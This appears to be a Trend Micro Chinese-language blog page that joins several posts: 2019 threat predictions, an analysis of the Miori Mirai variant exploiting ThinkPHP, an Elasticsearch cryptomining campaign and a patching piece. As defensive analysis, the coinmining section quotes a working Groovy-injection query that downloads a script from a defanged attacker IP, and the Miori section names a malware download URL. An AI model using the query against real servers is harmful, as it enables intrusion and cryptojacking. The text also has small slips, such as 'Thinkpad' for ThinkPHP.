趨勢科技對 2019 年的資安預測是根據我們內部研究專家對當前與新興科技、使用者行為、市場潮流以及這些因素對威脅情勢的影響所做的分析。我們考量其主要影響範圍以及科技與政治變革的擴散特性,將這些預測分成幾大領域。我們將分期刊出。
為了因應資安廠商推出的新技術,尤其是機器學習在網路資安領域重新獲得青睞,網路犯罪集團將運用更高的技巧來「魚目混珠」。歹徒將不斷開發出所謂「就地取材」的技巧,也就是將一些日常運算裝置用於原本設計之外的用途,並且在網路上分享。我們已經看到幾個這樣的例子。
當網路犯罪集團採用上述技巧來感染系統時,單靠機器學習技術來防禦資安威脅的企業將面臨嚴重考驗。我們預料這些網路犯罪技巧在 2019 年將越來越盛行。
零時差漏洞攻擊 一直是資安界的注目焦點之一,因為:
網路犯罪集團發動攻擊的最佳時機,其實是廠商釋出修補更新到企業系統真正套用這些更新之間的空窗期。
2019 年,漏洞攻擊的成功方程式是:利用一些已經釋出修補更新、但企業卻尚未套用更新的漏洞。這些漏洞可能有數週、甚至數個月的時間可以讓歹徒利用。未來,這類利用修補空窗期的漏洞攻擊,將是網路資安的一大禍源。
不論是 Docker 這套容器化軟體或 Kubernetes 這套容器協調系統,目前在雲端部署環境的使用率皆相當普遍。近年來 Kubernetes 已被發現數個漏洞 ,其中一個 「重大」等級的漏洞 就在今年即將結束之前被發現。根據一位專門研究雲端基礎架構漏洞的專家「Kromtech」發現,有十幾個惡意的 Docker 映像 在上架的一年內至少被不知情的開發人員下載了五百萬次。
隨著越來越多企業移轉至雲端,針對雲端基礎架構漏洞的研究將開始獲得進展,尤其,開放原始碼社群對於雲端相關軟體的使用率及研究正在日益成長。
原文出處:Mapping the Future:Dealing With Pervasive and Persistent Threats
延伸閱讀:
【2019 年資安預測 】在家上班員工,將為企業帶來那些資安風險?
【2019 年資安預測】被偷的帳號都被拿來做什麼?累積里程、製造假評論、灌票…
本報告為英文版,若要索取中文版,請至趨勢科技粉絲頁,私訊小編:「我要索取2019資安報告中文版」
對許多的物聯網(IoT ,Internet of Thing)使用者來說,針對智慧型設備的漏洞攻擊一直都是個問題。而最惡名昭彰的物聯網威脅或許是不斷變種的Mirai惡意軟體,一直被用在許多的攻擊活動中,會利用預設或弱帳密來入侵設備。自從它的原始碼在2016年流出之後,出現了各種不同的Mirai變種和衍生病毒。
我們分析了一個稱為「Miori」的Mirai變種,它會透過PHP框架(ThinkPHP)的遠端程式碼執行(RCE)漏洞散播。它所利用的漏洞比較新 – 相關的詳細資訊到12月11日才浮出水面。這隻IoT殭屍網路病毒會攻擊ThinkPHP 5.0.23及5.1.31之前版本的上述漏洞來進行散播。直得注意的是,我們的Smart Protection Network也顯示出ThinkPHP RCE相關資安事件在最近有所增加。我們認為駭客們會各自利用ThinkPHP漏洞來賺取好處。
除了Miori,有幾隻已知Mirai變種(如IZ1H9和APEP)也會利用相同的RCE漏洞進行散播。這些變種都會用預設帳密或暴力破解攻擊來透過Telnet入侵並散播到其他設備。一旦這些Mirai的變種感染了Linux機器,就會將其變成殭屍網路的一部分,用來進行分散式阻斷服務(DDoS)攻擊。
檢視Mirai變種 – Miori
Miori只是Mirai諸多分支的其中一個。Fortinet曾介紹過它跟另一個變種Shinoa有驚人的相似之處。我們自己的分析顯示使用Miori病毒的駭客利用Thinkpad RCE來讓有漏洞的機器從hxxp://144[.]202[.]49[.]126/php下載並執行惡意軟體:
圖1.、RCE下載並執行Miori惡意軟體
趨勢科技曾在蜜罐系統上發現了關於搜尋引擎 Elasticsearch (用Lucene程式庫開發的開放原始碼Java搜尋引擎)的惡意挖礦( coinmining )活動。這波攻擊利用了漏洞CVE-2015-1427(位在Groovy 腳本引擎,讓遠端攻擊者可以用特製腳本來執行任意 shell 命令)以及CVE-2014-320(Elasticsearch預設設定內的漏洞)。Elasticsearch已經不再支援有漏洞的版本。
我們在運行Elasticsearch的伺服器上發現帶有以下命令的查詢(ISC也在一篇文章中提到):
“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P
/tmp/sssooo\”).getText()”}}}”
這命令是由同個系統/攻擊主機執行,後續病毒也是放在此主機上。在本文編寫時,使用此IP的是網域matrixhazel[.]com(無法連上)。此系統安裝的是CentOS 6,同時運行了網頁伺服器和SSH伺服器。
圖1、GreyNotes將此這主機標記為已知掃描器
要注意的是,這種攻擊並不新鮮,只是最近又重新出現。趨勢科技的Smart Protection Network 11月在多個地區偵測到虛擬貨幣挖礦病毒,包括了台灣、中國和美國。
挖礦病毒散播bash腳本update.sh的方式是先調用shell來下載並輸出成檔案“/tmp/sssooo“(因為大多數系統對/tmp的限制較少)。
這種攻擊簡單卻會對受害者產生重大的影響。一旦攻擊者可以在系統上執行任意命令,就可以提升權限,甚至將目標轉向其他系統來進一步地入侵網路。
還應該注意的是,雖然大多數案例的攻擊手法相同,但所使用的惡意檔案可能不同。在我們所分析的案例中,使用的是update.sh。一但執行腳本update.sh就會下載檔案devtools和config.json。接著就會部署虛擬貨幣挖礦病毒(趨勢科技偵測為 Coinminer.Linux.MALXMR.UWEIS)。 繼續閱讀
漏洞可能會對企業造成難以預料的影響。一但被攻擊也會危害到個人身份資料(PII)隱私,帶來嚴重的後果。它們不僅會損害公司信譽 – 還損害了儲存管理這些敏感資料基礎設施的完整性。
Equifax資料外洩事件就是個很好的例子。攻擊者藉由入侵其應用程式框架內的漏洞(CVE-2017-5638)來取得其網路和系統的控制能力。這次攻擊讓1.455億份美國公民及1520萬份英國客戶的PII被外洩,造成的財務損失估計達到4.39億美元。
是的,只需要一個有漏洞的端點、網路、伺服器或應用程式,就可能會造成百萬倍的影響。Shellshock、Heartbleed、Poodle和EternalBlue都是惡名昭彰的安全漏洞之一,為資料竊取病毒及其他攻擊打開大門。但還有其他更多更多 – 事實上,在2017年有1,522個被公開報告的漏洞。這些漏洞有929個透過趨勢科技的零時差計畫(ZDI)披露,嚴重程度被評為「嚴重」或「高」。
[年中資安綜合報告:2018年上半年所披露的202個資料採集與監控系統(SCADA)漏洞]
更新修補程式可以協助企業有效地降低這些威脅。但對許多組織來說,這仍然是個常見的問題。事實上,被訪談的組織平均需要197天來識別資料外洩。而監視物聯網(IoT)設備和工業物聯網(IIoT)系統的新增任務更加劇了防止資料外洩的難度。IT和安全團隊也可能會發現要在所有漏洞遭受攻擊前完成下載、測試和部署修補程式,同時還要保持系統、網路和伺服器正常運行幾乎是件不可能的任務。
零時差攻擊對企業造成的影響越來越大。但緊急/非常態更新以及虛擬化等緊急措施可能會造成運作停擺和額外的成本。此外還有法規遵循的問題,如歐盟一般資料保護法規(GDPR)所可能帶來的巨額罰款或支付卡產業(PCI)嚴格的修補要求。
